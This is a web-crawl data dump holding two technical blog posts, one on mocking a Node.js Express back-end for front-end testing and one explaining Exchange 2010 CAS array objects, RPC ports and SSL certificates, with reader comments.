text
stringlengths
454
608k
url
stringlengths
17
896
dump
stringclasses
91 values
source
stringclasses
1 value
word_count
int64
101
114k
flesch_reading_ease
float64
50
104
Mock the back-end of your web application, using Node.js, to make developing and testing the front-end easier. Recently, I’ve worked on a couple of front-end projects where the back-end doesn’t actually exist (yet). No problem, of course - assuming the API is reasonably well defined (i.e. not likely to change much), then we can quickly build a simple mock back-end and start building the UI against that. When the time comes to make the real back-end available, it should be a simple task to swap it over. Not just throw-away code We don’t want to spend time building software only to throw it away again a short time later. Fortunately there are a number of other advantages to having a simple mock of the back-end. - Developers don’t need to install and maintain everything needed to run the real back-end (e.g. .Net/Java development environment, databases etc). - Developers can work on new features where API support is not ready. - Developers can tweak the API responses to develop less-used behaviour (error handling or restricted users). Testing End-to-end tests with a mock of the back-end (ok, so not quite end-to-end), can be much more focused than fully end-to-end tests. A real back-end’s responses change based on pre-existing state (e.g. changes in the database), but the mock can always respond the way the test expects. The tests should know exactly what is displayed on screen and what actions can be taken. They should be much less brittle, and require less maintenance. If the testing framework can start and control the mock back-end, then it can also precisely control responses from the API, and verify that the API gets invoked with the correct parameters and payload. Of course, this doesn’t eliminate the need for fully integrated end-to-end tests, but it can be a good way to create a more complete set of tests for the front-end. Example project I’ve created a suitably contrived project as a demonstration, which is intended to be as simple as possible while showing the capabilities. It is a web application that lets users do simple calculations, maintaining the current value as state to use as part of the next calculation. Hence, the server has persistent state that could cause end-to-end tests to interfere with each other. The full project is Mock-Api-Blog on GitHub, so please refer to that for the full code sample. The ReadMe also explains how to run the application and example tests. In this blog I’ll try to pull out interesting snippets to keep things simple. A Node.js mock server I wanted to make it nice and easy to add API-like modules, so I’ve created a simple pattern where each module exports its root path (under /api/), and an Express Router that implements all the API methods ( GET and POST etc). export const path = '/operators'; export const router = express.Router(); router.get('', (req, res) => { // GET /api/operators send(req, res, { operators: Object.keys(maths) }); }); Handling POST requests and parameters is also easy router.post('/:id', (req, res) => { // POST /api/operators/{id} with { operator parameter in body } const { id } = req.params; const { operator } = req.body; // ... }); Next, we can wrap all the API modules up together in an API router import * as operators from './routes/operators'; import * as domaths from './routes/do-maths'; const routes = [operators, domaths]; // Add the route for each API routes.map(route => { this.router.use(route.path, route.router); }); this.router.use('/*', (req, res) => { // Fallback if none of the APIs match res.status(404).send('Not Found'); }); Finally, we need to pull the API router into the Node Express server, under the path /api/. I’m using a simple proxy function here, which will make it easy to replace all the APIs with new ones at the beginning of each test, without having to stop and restart the server. This will help to avoid any state interactions between tests. In the code example below, globalApi is replaced by a new instance of the API router whenever a new Api() is created. // Setup the API mocks app.use('/api', (...args) => { // This allows us to easily reset the /api routes without restarting if (globalApi.router) { globalApi.router(...args); } }); The tests When I bundled the APIs together, I wrapped them in an Api class, so that whenever a new Api() is created, it effectively resets all the back-end state. This is crucial to the testing, because we want each test to get a “clean” version of the back-end, and not depend on which other tests have run first. While the tests can make use of the default mock APIs, we also want to be able to override specific URLs with behaviour that is custom for that test. The Api class does this too. In my test setup I can do something like this: // Spy on the POST request let postStub = sinon.spy((req, res) => send(req, res, { value: 13 })); beforeEach(async () => { // Reset the API and override the GET and POST for the /api/domaths endpoint new Api() .get('/domaths', (req, res) => send(req, res, { value: 10 })) .post('/domaths', postStub) .start(); await loadPage('', By.css('.App-maths')); }); As you can see the override for the GET request will always return { value: 13 } for these tests, so the test can verify that the correct information is displayed. The override for the POST request uses a spy, so that at the end of the test we can verify that POST was indeed called, and with the correct parameters. // Initial value should be displayed expect(await getElementText(By.css('.App-value'))).toBe('13'); // Input a number and submit await setInputValue(By.css('.App-input'), '3'); clickElement(By.css('.App-submit')); await driver.wait(until.elementLocated(By.css('.App-maths.calculated'))); // Verify the correct information was in the POST request expect(postStub.called).toBe(true); const postBody = postStub.firstCall.args[0].body; expect(postBody.operator).toBe('+'); expect(postBody.input).toBe('3'); Lastly, we can also get the API to throw errors to test the error handling in the front-end: beforeEach(async () => { new Api() .post('/domaths', (req, res) => error(req, res, 500, 'My Test Error')) .start(); await loadPage('', By.css('.App-maths')); }); Summary This simple mocking setup makes life easier for front-end developers. No need to wait for the real API to be ready, and no need to spend time installing and setting up all the tools necessary to run the real back end. It allows for some very specific front-end testing, without any of the usual problems associated with changing state. You’ll still want to create some end-to-end tests that leverage the real back end and test integration, but this can take the pressure off some of the more complicated UI behaviour.
https://blog.scottlogic.com/2018/03/20/mock-the-backend-with-node.html
CC-MAIN-2018-34
refinedweb
1,158
63.8
Next you will register the Java class as a managed bean in faces-config.xml. Then you will design a simple UI using two input text fields and a button, and bind the input fields and button to the managed bean using JSF EL Expressions. Finally you will hook up the button to a method in the managed bean that will invoke the business method when the button is clicked. JSFBeanAppas the application name. Accept the defaults and click Finish.<< In the Application Navigator you can collapse and expand any panel. You adjust the size of panels by dragging the splitter between two panels. To group and sort items in the Projects panel, use the _7<<. In the Create JSF Page dialog, enter Register.jsfas the file name. Make sure Facelets is the selected document type. The New Gallery The JSF navigation diagrammer The ADF task flow diagrammer (available only in the Studio edition of JDeveloper) On the Page Layout page, select Blank Page. On the Managed Bean page, select Do Not Automatically Expose UI Components in a Managed Bean. Click OK. By default JDeveloper displays the new JSF Facelets page in the visual editor..:. If you choose not to let JDeveloper use automatic component binding at page creation time, you can use the Property Inspector to manually bind any component on the page. For example, if you insert an input text component, click the When you create a new JSF page as a Facelets document type (with file extension .jsf), JDeveloper automatically creates a starter page structure with two xmlnsattributes for the JSF Core and JSF HTML tag libraries. The other elements included in a starter file are elements for laying out a page, specifically everything else within <f:view>and </f:view>. For example, the following code is generated for the new page: When you complete the steps for creating a JSF page, the Application Navigator should look something like this:When you complete the steps for creating a JSF page, the Application Navigator should look something like this: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" ""> <f:view xmlns: <html xmlns=""> <h:head> <title>Register</title> </h:head> <h:body> <h:form></h:form> </h:body> </html> </f:view> In the project, the folders and files that conform to the Java EE Web module directory structure are: In the Application Navigator, right-click the project you just created and choose New > General > Java Class, then click OK. In the Create Java Class dialog, enter the class name as PersonInfo. Accept the default values and click OK. In the source editor, add code to create a simple JavaBean object. For example, after the generated code: public PersonInfo() { super(); } Add two properties by PersonInfo. Make sure public is selected in the Scope dropdown list, then click OK. In the source editor, add code to retrieve the data that is entered and then display a message using the data. For example, after the generated method: public String getEmail() { return email; } Add the following method: Click Save All to save your work. In the Application Navigator, you should see PersonInfo.javain the project1 package in the Application Sources folder. Oracle ADF Business Components (available only in the Studio edition of JDeveloper) Enterprise JavaBeans (EJB) Oracle TopLink, which helps to map your Java classes and EJBs to database tables. private String email; The example you are creating requires a user to enter data in two fields and then click a button to display a message. To capture the data, you need to add two properties and create getter and setter methods on the properties. Later you will add a method to save the input data and display a message using the data. System.out.println("saving..." + name + " " + mail); }. To work with a specific business service, you can open the New Gallery and use the provided wizards and dialogs to create or, in the case of web services, expose the entities in your model project. In the Application Navigator, double-click faces-config.xml to open it in the editor window. Managed beans Custom message bundles Custom validators and converters Select the Overview tab at the bottom of the editor window to use the overview editor. By default the Managed Beans page is shown on the overview editor. Click to open the Create Managed Bean dialog. Enter personDataas the bean name. Then click next to the Class Name field to open the class browser. Enter PersonInfoin the field and then select PersonInfo (project1). Click OK to close the class browser. In the Create Managed Bean dialog, select Configuration File. Then verify you now have the following values entered or selected:. Click OK. You should see the new managed bean definition in the overview editor: The resources your application needs are specified in the JSF configuration file, faces-config.xml. The resources an application might need include: faces-config.xml. faces-config.xmlfile by either editing the XML in the file manually, or using an overview editor for configuration files, which provides creation dialogs and browse features for finding class file references for your beans. To define a managed bean in faces-config.xml, you add an entry to the JSF configuration file, giving a symbolic name that you will use to refer to the bean and specifying. faces-config.xml. Using managed bean annotations reduces the size and complexity of the faces-config.xmlfile, which can grow quite substantially. When you use annotations, instead of adding a <managed-bean>element in faces-config.xmlJDeveloper adds the annotations @ManagedBeanand @RequestScopein the JavaBean class file. For example: @ManagedBean(name="backing_mypage") @RequestScoped public class MypageInfo { ... } faces-config.xmlto configure a managed bean, JDeveloper automatically updates the faces-config.xmlfile for you with the necessary configuration elements. For example: <managed-bean> <managed-bean-name>personData</managed-bean-name> <managed-bean-class>project1.PersonInfo</managed-bean-class> <managed-bean-scope>request</managed-bean-scope> </managed-bean> When the JSF application starts up, it parses faces-config.xmland the managed. In the editor window, select the Register.jsf tab at the top to bring the page forward. In the visual editor, type the text Registration Format the top of the page. In the Component Palette, select the HTML page from the dropdown list and then expand the Common panel. Click and drag Table to the visual editor, then drop it on the page to add a table. In the Insert Table dialog, set the number of rows to 3and the number of columns to 2. Accept the other default values and click OK. In the Component Palette, select the JSF page from the dropdown list and then expand the HTML panel. The JavaServer Faces HTML tag library, which contains tags representing common HTML user interface components. The JavaServer Faces Core tag library, which contains tags that perform core actions such as event handling and data conversion. Drag and drop Input Text on the first row, second column of the table. The entire table, place the cursor at the bottom right corner of the table border, and click when the table selector icon appears. Rows, place the cursor on the left border of the table and click when the row selector icon appears. Columns, place the cursor on the top border of the table, and click when the column selector icon appears. Cells, click in a single cell or press Ctrl and click in multiple cells. Drag the resize handles to the desired size for the table. Place cursor at the border of the row or column you wish to resize, and click when the horizontal border handle or vertical border handle appears. Click Background Color to apply a color to the table, row, or cell in the selected color. Click Left Center Right to apply the respective left, center or right alignment to a selected table. Click Indent or Outdent to indent or remove indentation from the selected table by applying or removing the <blockquote>tag. Drag and drop another Input Text on the second row, second column. Drag and drop Command Button on the third row, second column. visual editor, click in the table cell of the first row, first column, and type Username:. Then type The visual editor should now look similar to the following: . For example: : PropertyResourceBundleproperties file or a plain-text file containing translatable text. A properties file can contain values only for Stringobjects. If you need to store other types of objects, use a ListResourceBundleinstead. When Automatically Synchronize Bundle is selected, after you enter text in the visual editor and press Enter, JDeveloper displays the text as an EL expression: JDeveloper also creates the properties file. For example: # SOME_TEXT=Some Text Help information is provided for each component, explaining its purpose and its attributes. To find such information, right-click an item in a panel in the Component Palette and choose Help.: To resize a table: #{expression}using JSF Expression Language (EL). For example, #{personData.username}. When you add a component to the JSF page, the Property Inspector displays the supported attributes for the component tag grouped in these categories: In the visual editor, select the first input text field. Then in the Property Inspector, Common section, choose Expression Builder from the dropdown menu next to the Value field. In the Expression Builder, expand JSF Managed Beans, then expand personData. Select username to create an expression using the usernamevariable.. Repeat the procedure on the second input text field, selecting the email variable in the Expression Builder this time. In the visual editor, double-click the command button to open the Bind Action Property dialog. In the Managed Bean dropdown list, select personData. Accept the default values in the dialog and click OK. JDeveloper displays the Java class file in the editor window, showing the code added for you when you bound the command button component: usernameand Bean properties can be bound to component values or component instances. In the example, you will bind the bean properties to component values using the Expression Builder. : valueattributes to the bean properties. The command button component can be bound to methods in JavaBeans. The Bind Action Property dialog enables you to bind the button's actionattribute to a new method that you will create next in the JavaBean. Register.jsfpage, if you click Source to switch to the XML editor, <h:inputText <h:inputText <h:commandButton action="#{personData.commandButton_action}".../> If necessary, select the PersonInfo.java tab in the editor window to bring the source editor forward. In the generated action method, add code to call the business method saveInfothat you previously added to the bean. Recall that the saveInfomethod takes two parameters and writes the data to the console. So for example, after the comment line in the generated code: // Add event code here... Insert the following code shown in bold: In the Application Navigator, right-click> For example: // Add event code here... saveInfo (this.username, this.email); return null; } When you run a JSF application in the IDE, JDeveloper automatically: ...the data you entered will be written to the Log window in JDeveloper. For example, if you entered guestand guest@oracle.com, you should see the following message at the bottom of the Log window: saving...guest guest@oracle.com To stop the application, click Note: Terminating the application stops and undeploys the application from Integrated WebLogic Server but it does not terminate Integrated WebLogic Server. - Use JDeveloper wizards and dialogs to create applications, starter pages and starter Java classes - Use the JSF configuration editor to register Java classes as managed beans - Use the visual editor, Component Palette, and Property Inspector to create UI pages - Use Integrated WebLogic Server to run a JSF application
http://docs.oracle.com/cd/E18941_01/tutorials/jdtut_11r2_33/jdtut_11r2_33.html
CC-MAIN-2015-35
refinedweb
1,949
55.64
I would like to write an IErrorHandler implementation that lets me map back to the the type of the throwing class. If I can map back to the type of class that originally threw the exception I could look for a custom error handling attribute that would allow me to customize error handling behavior for the current error. Is this possible? If so, how do you map back to the class that originally threw the exception? thanks View Complete Post I want to check the user credentials of asp_net Membership database, for that While using the Membership class it is throwing "Operation is not valid due to the current state of the object". Hi, I am trying to set a integer value in a class from license information, and then get that value passed back to my Program.cs class (e.g. of value 10). However when I try to return the value to another part of the class (as below) it says 'Cannot implicitly convert type to Manco.Licensing.License'. Also any idea how do I call this class to get this integer value back to Program.cs ie should this be LCheck.Value.days? In this class daysleft is a integer value. using System; public class LCheck { private Manco.Licensing.License m_License; public static int daysleft; public static int days; public int Value { get { int days = daysleft; return days; } } public Manco.Licensing.License License { set { m_License = value; daysleft = Convert.ToInt32(m_License.DaysLeft.TotalDays); } get { return daysleft; } } }
http://www.dotnetspark.com/links/42949-use-ierrorhandler-to-map-back-to-throwing.aspx
CC-MAIN-2017-51
refinedweb
248
65.12
- , - Hot topics in Frameworks Softwaresistema academico php mysql sistema de ventas php gambas 3 base de datos control de activos fijos ActiveRules ActiveRules Social Site Application Server Open Framework Open Framework - database editor with dynamic interface and report builder. ToKo framework ToKo is a webpage developement framework in PHP 5, whose aim is to quickly and easily develop small webpages like personal websites and pages of small companies. It follows the OOP paradigm and uses the AJAXia Project Adminia System is a framework to help php developers make administration modules for their web sites. The general idea is to provide with a simple and light-weight framework that can be used in about five minutes per administrative section.. PHP stdlib A project to bring elements of the std namespace from C++ to PHP 5.3. It will include common C++ includes (cstdlib,cmath,etc) as well as several classes derived from STL (containers, iterators, algorithms, etc). Grappelli The Web framework for perfectionists with deadlines (who can't use python). Grappelli aims to be functionally equal to and as easy to use as Django for python. It is a complete rewrite, and rework since PHP struggles in areas of Object Orientation. -wikPHP KwikPHP is a PHP library designed to give developers access to many common libraries and configuration scripts for those libraries right off the bat. Examples of common libraries include Smarty and ADOdb, though any library can be used with KwikPHP. kTemplates PHP simple templates engine. Has a metalanguage for blocks,iterations,conditionals,etc Manages caching results. It should be fast. Mods Base Mods Base makes it for users easyer to install, update, disable/enable or remove mods. For developers Mods Base makes it easyer to create mods for both phpBB2.0.x and Olympus. Picara Framework Another open source web development framework written from scratch in PHP NeverForms NeverForms is a collection of Classes that helps with HTML form manipulation. The project interfaces MySQL tables to an HTML form. The purpose is to provide abstraction of the database schema from the PHP code. Some inspiration came from Ruby ScaffuHH web application framework A framework to generate simple web based applications, with all HTML code generated 100% in conformance with W3C standards.. Nette Nette is an event-driven and component-based framework for rapid Web Application development using PHP 5. Brings you familarity of developing desktop GUI applications with tools such as Borland Delphi or ASP.NET.. Bionic! CMS, first intelligent CMS This project is developed as very first intelligent CMS on the world - its fully adaptabile and very user-friendly CMS / ESHOP , primary build for performance becouse of unique system of site-side-caching. - CMV Framework Extremely simplified yet powerful PHP coding framework that aims at being easy to use as a building block for other systems such as CMSes (Content Management Systems) or standalone. It provides basic MVC framework to build upon. Simple Rapid Application Development Srad framework for PHP5 provides a easy way to create and manage web-based applications object oriented with PHP5, ADOdb, Ajax and Smarty template engine. Pandora Feeds for WordPress A plugin for displaying RSS-feeds from in WordPress-themes. NuCore A system that allows bloggers to use richly decorated HTML templates with a basic CMS into it, allowing them to use highly artistic blogs instead of just the available themes. QLSinfonia Visual tool for symfony php framework
https://sourceforge.net/directory/development/frameworks/language%3Aphp/?sort=update&page=5
CC-MAIN-2017-22
refinedweb
565
53
Type: Posts; User: jeffrey@toad.net Hi Chuck, I know this is a bit late... Windows 2000, VC++ 6.0 and no SDK gets the same results. If I install latest SDK (March 2006), I get a Link Error 1103 - LNK1103 - UUID library is... Hi All, Has anyone done this before? I need to set up a DSN through a setup program so the users will not have to (and get elevated rights). It would be the information contained in the Data... Hi, Peek() is a member of istream. Goole is your friend. Jeff Hi, IServerInfo* pNewServer = NULL; HRESULT hr = pNewServer->CoCreateInstance(__uuidof(ServerInfo)); if(SUCCEEDED(hr)) { // Populate COM object properties here..... // Now Fire Event.... Hi, Does VS2003 have an ncb file? if so, rename it and open the project (solution) again. Jeff Hi diehardii, I not sure string::str() is guarunteed to return a NULL terminated string. Try using string::c_str() instead. It does return a NULL terminated string. See... Hi, FindFirstFileEx takes 6 parameters. Are you confusing it with FindFirstFile? Jeff Hi, Have you looked at MSDN? Jeff Hi Mike, Thanks. I could not get you any points - I have to spread them around. It's funny the system does not allow me to rate the same people over and over (considering they are helping me... Hi, #include "stdafx.h" should be the very first include in a source file (*.cpp). Jeff Hi, See if you are smashing your buffer. Comment out the following: char buffer[MAX_CHANNEL_NAME]; memset( buffer, 0x0, MAX_CHANNEL_NAME ); //channels->Get(i,&pChanEncontrado); ... Hi draqula, If you want to study the algorithms, see Knuth's The Art of Computer Programming, Seminumerical Algorithms. If you want an implementation, I prefer Crypto++. An implementation of... Hi All, I'm looking for a solid Ping class. Does anyone know of a good download? I can't get my boss to spring for IPSentry or What's Up Gold, so I'm going to try to roll a basic monitor. ... Hi yinkou, The following should also work (I've used it during scripting, but I like the long file names also). C:\>dir /X Volume in drive C has no label. Volume Serial Number is 58AC-2403... Hi, Add an assert to snap the debugger: Array(long Size = 0) { if(Size < 0) Size = 0; ASSERT( Size > 0 ); Also, an n element array is indexed 0 to n-1. _T& operator[](long ID) const { if(ID < 0 || ID > p_Size) ID = 0; return(p_Array[ID]); } Hi Mitsukai, Though the following is legal C++, it blows up in M$'s implementation (at least in the VC++ 6.0 era): p_Array = new _T[p_Size = Size /*=0*/];Jeff Hi All, Thanks for the responses. I tossed out points where the system would let me (SuperKoko: sorry - I'm told I have to spread them around). In the end, I see I left out an important... Hi Graham, Basically - I do a lot with MFC. Below is probably more helpful... CString s; CryptoPP::Integer n; s << n; SetEditWindowText( IDC_EDIT_MODULUS, n );Then, Hi Rantech, has samples on fork/exec. See Chapter 8 examples, 'Process Control'. If pid == 0, you're in the child. Simply do it recursively. I crashed a... Hi All, I'm using a library (Crypto++) which defines an Integer (arbitrary size). The Integer class defines operator<<. I find that I have to continually copy and paste conversion code to... Hi, I've never tried it, but SetFont() on the constituent controls of the Combo Box. See;en-us;Q174667 Jeff Hi ahoodin, Setting Breakpoints When Values Change may be useful for you. Jeff Hi WU, You may also want to read a bit about First and Second Chance Exceptions. Jeff
http://forums.codeguru.com/search.php?s=8f50e37dccda4ef00c09f69f2f47f5ba&searchid=5104319
CC-MAIN-2014-41
refinedweb
616
77.64
. Everyone confused? Nice. Let’s try to fix that as best we can by going through each of these one at a time. You'll see some server names throughout this article so why don’t I show you what I’m working with in my lab first? OK, let's dig in! A CAS array object performs no load balancing. It's an Active Directory object used to automate some functions within Exchange and that's all. Exchange 2010 documentation says all over the place that it's recommended to use load balancers (LB) to load balance CAS traffic. So what do I mean by saying the CAS array object performs no load balancing? What you're actually doing with a load balancer is balancing traffic across a pool of CAS or perhaps you could call it an array of CAS - but not the CAS array object itself. The difference is subtle yet distinct; perhaps we didn’t make the names distinct enough to help prevent the confusion in the first place. The primary reason, and perhaps the only reason, a CAS array object exists is to automatically populate the RpcClientAccessServer attribute of any new Exchange 2010 mailbox database created in the same Active Directory site (as the CAS array object). The RpcClientAccessServer attribute is used to tell Outlook clients during the profile creation process what server name should be in the profile. That’s pretty much it folks, there's no more magic going on here and once you've created your CAS array object it's simply an object in Active Directory and there's zero load balancing going on at this point in time. The rest is up to you at this point. It's up to you to: The CAS themselves have no idea there is any load balancing happening. You may also be confused by what can be seen after creating a CAS array object using the New-ClientAccessArray cmdlet or viewing a pre-existing CAS array object using the Get-ClientAccessArray cmdlet. Here I'm creating a new CAS array object in my lab with the Name CASArray-A, the FQDN of outlook.lab.local, and in the Active Directory site very aptly named Site-A. Figure 1: Creating a Client Access array First of all my FQDN and Name fields don’t match because the Name is a display name - it's purely cosmetic. It's whatever you want to name it so you know what that CAS array object is being used for. The FQDN is the record you must then create in DNS or else clients will never be able to resolve it to an IP address to connect to. At this point, I’ll remind you that there can be only one CAS array object per Active Directory site. So why is the Members property populated with two CAS immediately after creation? Didn’t I tell you there's no load balancing going on at this point? It looks kind of like I lied to you doesn’t it? To be honest, the Members property is a touch misleading. If you didn’t read up on the steps to create a CAS array object you may think you’re done at this stage. You created your CAS array object and you can see two CAS have automatically joined the array. By this time you may be off for a celebratory drink or going down cube-town hallway to steal some cookies from this guy. Not quite yet my friend! Due to the fact that we associated the CAS array object to Active Directory site Site-A, the cmdlet simply goes and finds all Client Access servers registered as residing in Site-A and then lists them in the Members column. I like to tell customers to think of this column as the Potential Members column or as my colleague Kamal Abburi, another PFE here at Microsoft, suggests it's the Site CAS Members column. You can add these Client Access servers as nodes in your load balancing solution because they all reside in the same Active Directory site. But until the load balancer is configured we have no load balancing. How did the cmdlets know what site the CAS are in? Well, I’m glad you asked because we get to break out everybody’s best friend AdsiEdit.msc and dig down into the Configuration partition of Active Directory to find the magic beans. Figure 2: The msExchServerSite attribute of an Exchange 2010 server contains the Active Directory site the server resides in Each Exchange server has an msExchServerSite attribute that contains the Active Directory site they currently reside in. In case you're wondering, yes it's dynamically updated if you move an Exchange server to a new site and the Microsoft Exchange Active Directory Topology service has a chance to run and update a few things. But the AutoDiscoverSiteScope attribute (Part of Get/Set-ClientAccessServer) will not be dynamically updated and you may have funky Autodiscover results until this is fixed – depending on your site, server, and client layout. Let’s go back for a moment to what a CAS array object actually does. It populates the RpcClientAccessServer attribute of an Exchange 2010 mailbox database, which is then used to tell Outlook where it needs to connect when using RPC (over TCP). For Outlook Anywhere (HTTPS) clients, it indicates where the traffic that leaves the RPC-over-HTTP proxy needs to connect on the client’s behalf in order to reach their mailbox. So what services does the Outlook client attempt to connect to when using RPC (over TCP)? First Outlook connects to the CAS array object on TCP/135 to communicate with the RPC Endpoint Mapper in order to discover the TCP ports the following two services are listening on. That’s it for RPC (over TCP) mode! Outlook Anywhere (aka RPC over HTTP) clients connect to the RPC-over-HTTP proxy component on TCP/443 on a CAS by resolving the Outlook Anywhere external hostname, or what the Outlook profile calls the proxy server. Interesting geeky side note for anyone interested, Outlook automagically and quietly adds /rpc/rpcproxy.dll to the server name specified, as that’s really what it needs to connect to, but if we asked people to type these names in, like we used to back in Outlook 2003 days, can you imagine how many would have missed it, or got it wrong?) Traffic is routed out of the RPC-over-HTTP proxy to the appropriate MAPI/RPC endpoint using a list of hard-coded, rather than dynamically assigned TCP ports, those being TCP 6001, TCP 6002, and TCP 6004. The Outlook Anywhere external hostname is purposefully not the same FQDN as the CAS array object and I’ll explain why later on. A client may also make HTTPS connections to services such as Autodiscover, OAB downloads, EWS, POP, or IMAP, but these services are defined by entirely different methods such as virtual directory URLs or the AutoDiscoverServiceInternalUri value. None of these additional services are serviced by the CAS array object as none of them are using RPC, although it’s likely to be the same server they are connecting to. The CAS array object’s FQDN may share the same VIP as the other service’s URLs, but we strongly recommend the CAS array object FQDN not be the same as the other services’ URLs if split DNS is in use. More on that last recommendation later. This is a very common misconception usually spawned due to the item directly above. SSL certificates in the realm of this article are only utilized when we want to do something like establish an SSL-protected HTTP session. Because RPC (over TCP) is not an HTTP session, it's not going to be protected with SSL and therefore, we don't need the CAS array object's FQDN to be included on the subject name list of the SSL certificate. Let's take a look at it. Below is Outlook 2010 in MAPI/RPC mode connected to an Exchange 2010 CAS array object. Figure 4: Outlook 2010 RPC (over TCP) connections to Exchange 2010 CAS We can see it has made one directory and two mail connections. In the netstat output (overlayed above the screenshot) we see the machine has made one endpoint mapper connection (TCP 135) to the CAS array object as well as connections to TCP 59531 and TCP 59532 which represent the statically assigned TCP ports for the MSExchangRPC and MSExchangeAB services respectively in this lab. From the server side we can see the services listening using the command netstat –n –b. Figure 5: Services Outlook needs to connect to when using RPC (over TCP) As expected, it shows that none of the services are being contacted over HTTP (to TCP 443). This is why you don't need the CAS array object FQDN on the SSL certificate. Thinking you need the CAS array FQDN on the SSL certificate can sometimes be confused by the way Outlook displays connections while in HTTPS mode as seen below. Figure 6:Outlook Anywhere connections This time we see Outlook 2010 has made two mail connections and a Public Folder connection when the screen shot was taken and we can also see we are using HTTPS. From within Outlook it looks as if we are connected to outlook.lab.local and E2K10-MLT-01.lab.local, which we are sort of, but utilizing netstat once again we see we are actually connected to the RPC-over-HTTP proxy located at webmail.lab.local on TCP/443 (HTTPS). Outlook will always display what server is eventually connected to for data by itself or via RPC-over-HTTP proxy. If you're wondering why we see 6 connections via netstat instead of three, it's because HTTP is a half-duplex protocol and we therefore establish an RPC_DATA_IN and an RPC_DATA_OUT channel for each connection seen inside Outlook. You may also be thinking, “Wait! Outlook 2007 and 2010 encrypt RPC sessions by default! We have to have the name on the cert!” Wrong-O my friends because the encryption setting you see below utilizes RPC encryption and has nothing to do with SSL. The communication is still happening over RPC and not over HTTPS. Figure 7: When connecting using RPC (over TCP), Outlook uses RPC encryption Simple isn’t it! If a CAS array object met a Certification Authority and the CA said: “Hey man you really need me! C’mon I’ll sell you a swanky wildcard cert on the cheap!” the CAS array object would simply reply “Honey badger don’t care!” and probably use the CA to crack open a pistachio. Now that's of course if you followed our recommendation to use a different FQDN for the CAS array object than you’re using for the other service FQDN(s). Yes, I’m getting to why… I hope Part 1 of this article has been helpful to you so far in making sense of some common misunderstood issues with CAS array objects, and hope that you’ll tune in for Part 2 at a later time where we'll cover the remaining three common misconceptions about CAS array objects. Brian Day Premier Field Engineer, Messaging Continue to Demystifying the CAS Array Object - Part 2. LOL, I know the URL that defines the name of the CAS Array object doesn't need SSL, but I have included it in a SAN certificate before without even thinking about it. I am sure alot of people do that. As long as you are opening port 443 on the LB then no harm. Atleast it was an internal CA and it didn't cost me any money. I meant not opening port 443 on the LB. @AA, Part-2 will help complete the picture but generally the very same LB will also have TCP/443 open for everything non MAPI; OWA, ECP, EAS, OLA, EWS, etc... Great article. If you were bringing up two stand alone multi-role servers in a site (CAS/HT/MB) and you wanted to start using a CAS array but did not have any load balancer in place yet, could you just add an A record for each server using the CAS array name? Or would you be better off just using a single A record for the CAS array name and letting one of the two servers handle that load until a LB is in place? I really don't want to have all the users profiles have the server names and then have to run a profile repair on each one after the '-rpcclientaccessserver attribute is changed if we move to a CAS array at a later time. Thanks. Hi Brian, Thank you for useful information! Superb Part 1 Brian, cant wait to read Part 2 :) Thank you everyone. @TB, Part-2 will touch on this, but I would consider creating the CAS Array Object with a friendly FQDN name (e.g. 'outlook.domain.com') , create an A record with a low TTL value (5 mins maybe), set RpcClientAccessServer to point to that FQDN on all DBs, and temporarily point that DNS record to one server for now. It'll mean manual failover for now by changing the DNS record (why we want the low TTL), or if both servers are on the same subnet you may be able to get away with adding an IP to one box, point the A record at that IP, and then move the IP between servers when you have to. If you never plan on implementing a DAG (which you should! :) ) then Windows NLB could be stop-gap option, but we generally recommend a Hardware Load Balancer for all customers. You can usually find me in the Exchange 2010 TechNet forums if you have more detailed questions, but some more coming in Part-2.... That was a great info for me & added to my knowledge, clarified few things. Looking forward on your next part too :) @Brian.... thanks for the confirmation. I'll stick with a single A record for now until we can move to a DAG. One more follow up question: If we change the -rpcclientaccessserver attribute on existing databases once we bring up the CAS array, shouldn't the existing clients continue to work if they still point to a previous multi-role server that still exists (and resolves to the server IP). I know a profile re-creation would update them to show the new CAS array name in the profile but I don't want to have to do that for 700+ users in a particular office. Thanks. @TB: Outlook autodicover service will be picking up the new CAS Array name for the OL clients. @Imrul, this actually isn't the case and Part-2 discusses how AutoD doesn't update the server name in the profile. @TB, yes the clients will continue to connect to whatever server their profile was originally setup with. @brian: Corrent me if i am wrong, its kinda bug in Outlook that it does not update the server name. In a cross-site failure when the whole site is down, mailbox become active in DR site thanks to DAG. We have to make sure in DNS CAS in Site A must be made to resolve to an IP of CAS in DR site and we dont have to modify the RPCClientAccess Property of the databases right ? @Brian: We deployed a CAS Array for a customer and later configured the pre-existing DB's rpccclientaccessserver attribute to point to the CAS Array. We found that autodiscover picked up the CAS Array name in the user's OL profile. There was no need for profile repair/ profile recreation. Yes, there are still some users whose OL was not updated with the new CAS Name and we had to do the profile repair / profile recreation for those small number of users. So far my understanding and experience, autodiscover is responsible for updating OL with the new cas array name. Please correct me, if I misunderstood anything. Thanks. Hi Brian, Your recommendation to TB re: a DAG - is that so that they can take advantage of the cluster to add an ip resource that can be used for failover (rather than load balancing) for smaller 2-node DAGs that only require HA but don't have the need for LB? @Wes, it was just a way to get a relatively quick switchover instead of waiting for DNS updates to propagate but adding a 2nd IP to the NIC (not cluster). WNLB could be used, but if you then wanted to DAG enable the two machines then you'd have to remove WNLB and go with a Hardware LB. @Praveen & Imrul, wait for Part-2 then re-ask. :) @brian: no problem. Will be waiting for part 2. Thanks. Regarding #3, if you would like to integrate Lync into OWA, you will need the FQDN of the Client Access server or CAS Array FQDN as the subject line of the SSL certificate. This ending up biting me when I was integrating Lync into OWA. Excellent Article. Waiting for the part 2 @Ryan, Lync does not use the CAS Array Object as it is not using MAPI to integrate with OWA. When setting up the trusted application in Lync you would be using the "Multiple Computer Pool" option and then give Lync a load balanced name (such as owa.contoso.com) also included in the SSL cert, but not the CAS Array Object name (such as outlook.contoso.com). Items #2 and #3 come into play here as the CAS Array Object is not used for EWS and it does not need to be on the SSL certificate as long as you properly gave it a name different from all of your other load balanced services like OWA, EWS, AutoD, OAB, etc... Great article Brian! Just wanted to mention, lot of customers don't actually utilize different namespaces for RPC vs HTTP traffic hence resulting design uses same name that is used by CAS Array FQDN. This is where the name will need to be in certificate. @Bhargav, quite right you are my friend which is why Item 4 in Part-2 will discuss this common misconfiguration. :) When is Part 2 due Brian..? We're interested in the issues with having a common namespace for the array as well as the client access URLs for OWA, IMAP etc. Thanks! You touched every aspect I could imagine for your 1-3 items. Air five! Great article; but can you guys please enable a "printer friendly' button for those of us that would like to print this for reference materials? right now we have to cut and paste into Word and reformat to make legible!!!!!!! Thanks This was a great article - thank you. Wish however this was around before as it would have saved me adding the CAS Array name to our SSL 